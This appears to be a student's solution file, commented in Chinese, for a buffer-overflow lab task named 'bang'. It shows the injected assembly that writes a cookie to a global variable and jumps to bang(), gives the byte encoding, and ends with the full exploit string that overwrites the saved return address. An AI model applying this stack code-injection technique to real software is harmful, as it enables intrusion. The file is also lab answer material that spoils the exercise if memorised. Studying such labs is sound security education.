
/* 任务3:bang cookie=0x603ce04d */
/* 通过查看反汇编文件获得bang()的入口地址为0x08048d05,全局变量的地址为0x804c218 */
/* 
修改global变量的汇编语句如下:
mov $0x603ce04d,%eax ;将cookie送到eax
mov %eax,0x804c218   ;将eax的值送到global变量
push $0x08048d05     ;将bang()的入口地址入栈
ret		     ;bang()的入口地址出栈赋给eip
使用gdb获得缓冲区首址为0x55683028,将堆栈中eip的值修改为0x55683028,返回到恶意代码中,然后执行完恶意代码,通过恶意代码中的push和ret指令进入到bang函数中.
*/
/* 通过汇编、反汇编获得恶意代码的字节序列如下:
0:	b8 4d e0 3c 60       	mov    $0x603ce04d,%eax
5:	a3 18 c2 04 08       	mov    %eax,0x804c218
a:	68 05 8d 04 08       	push   $0x8048d05
f:	c3                   	ret    
将恶意代码输入到buf缓冲区中
 */
b8 4d e0 3c 60 a3 18 c2 04 08 68 05 8d 04 08 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     00 00 00 00     28 30 68 55
